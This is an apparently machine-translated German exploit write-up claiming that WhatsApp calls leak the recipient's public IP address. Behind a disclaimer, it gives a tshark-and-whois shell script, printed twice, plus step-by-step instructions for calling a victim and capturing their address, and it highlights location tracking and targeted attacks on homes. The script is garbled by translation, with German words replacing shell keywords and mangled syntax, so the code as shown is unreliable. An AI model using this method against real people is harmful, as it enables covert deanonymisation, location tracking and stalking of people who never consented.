Dieses Programm dient nur für Bildungszwecke. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt insbesondere für die Tatsache, dass ich (BHDRESH) nicht für Schäden haftet, die durch die direkte oder indirekte Verwendung der von diesen Programmen bereitgestellten Informationen oder Funktionen verursacht werden. Der Autor oder ein Internetanbieter trägt keine Verantwortung für Inhalte oder Missbrauch dieser Programme oder deren Derivate davon. Durch die Verwendung dieses Programms akzeptieren Sie die Tatsache, dass Schäden (Dataloss, Systemabsturz, System Kompromisse usw.), die durch die Verwendung dieser Programme verursacht werden, nicht die Verantwortung von Bhdresh liegt.
Schließlich ist dies eine persönliche Entwicklung. Bitte respektieren Sie ihre Philosophie und verwenden Sie sie nicht für schlechte Dinge!
https://vimeo.com/577355374
Die neueste Version der WhatsApp -Anwendung auf allen Plattformen ist anfällig für Remote WhatsApp -Benutzer Public IP Offenlegung.
Es wird beobachtet, dass während eines WhatsApp -Anrufs (Voice / Video) die Anwendung auf der Caller -Seite versucht, eine direkte Verbindung mit der öffentlichen IP -Adresse des Empfängergeräts herzustellen. Durch die Filterung der IP -Adressen von Facebook und WhatsApp -Server von den Zielhosts ist es möglich, die richtige öffentliche IP -Adresse des Ziel -WhatsApp -Benutzers ohne sein Wissen anzuzeigen.
Im Folgenden finden Sie ein kurzes Skript, um diese Sicherheitsanfälligkeit auszunutzen.
#!/bin/sh
filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Drücken Sie ein Eingabetaste und rufen Sie Ihr Ziel an."
Zeile lesen
tshark -i Eth0 -l -t Felder -f "uDp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 und ip.dst! = 10.0.0/8 und ip.dst! = 172.16.0.0/12 "| Während der Read Line Do whois $ line> /tmp /b
filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
wenn ["$ filter" -Gt 0]; dann targetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetInfo fi fertiggestellt
Die Möglichkeit, WhatsApp -Benutzer mit ihrer öffentlichen IP abzubilden, enthüllt nicht nur die Standortinformationen von WhatsApp -Benutzern, sondern kann auch missbraucht werden, um ihre physische Bewegung durch die Aufrechterhaltung der Standorthistorie zu verfolgen. Eine solche direkte Zuordnung zwischen Benutzer und IP -Informationen kann auch missbraucht werden, um die Surfengewohnheiten der Benutzer zu verfolgen und ihn zu beeinflussen.
Darüber hinaus könnte die öffentliche IP ausgenutzt werden, um gezielte Angriffe auf WhatsApp -Benutzer nach Hause oder Büro zu starten.
Benutzer: Usera hat WhatsApp -Details von UserB
Umgebung: n/a
Browser: n/a
App -Version: <= Neueste Version der WhatsApp -Anwendung auf einer beliebigen Plattform
OS: Alle Plattformen außer Web
Beschreibung: Usera trifft einen WhatsApp -Anruf bei UserB und erfasst seine öffentlichen IP -Informationen ohne Kenntnisse von UserB. Video POC für ein besseres Verständnis der Schritte: https://vimeo.com/577355374
Schritt 1: Starten Sie den WiFi -Hotspot auf dem Angreifer -Computer und verbinden Sie den Angreifer -Telefon mit dem Angreifer SSID
Schritt 2: Starten Sie das POC -Skript (unten) auf dem Angreifer -Computer, der jetzt als Router für das Angreifer -Telefon fungiert
#!/bin/sh
filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Drücken Sie ein Eingabetaste und rufen Sie Ihr Ziel an."
Zeile lesen
tshark -i Eth0 -l -t Felder -f "uDp" -e ip.dst -y "$ filter" -y "ip.dst! = 192.168.0.0/16 und ip.dst! = 10.0.0/8 und ip.dst! = 172.16.0.0/12 "| Während der Read Line Do whois $ line> /tmp /b
filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
wenn ["$ filter" -Gt 0]; dann targetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetInfo fi fertiggestellt
Schritt 3: Rufen Sie einen beliebigen WhatsApp -Benutzer zufällig an, um die Server -IP -Adressen zum Filter zu erfassen
Schritt 4: Rufen Sie Opfer auf seiner WhatsApp an
Schritt 5: Trennen Sie den Anruf, sobald festgelegt wurde
Schritt 6: Das Skript wird die öffentliche IP -Adresse des Ziels angezeigt
Schritt 7: Validieren Sie die öffentliche IP -Adresse am Zieltelefon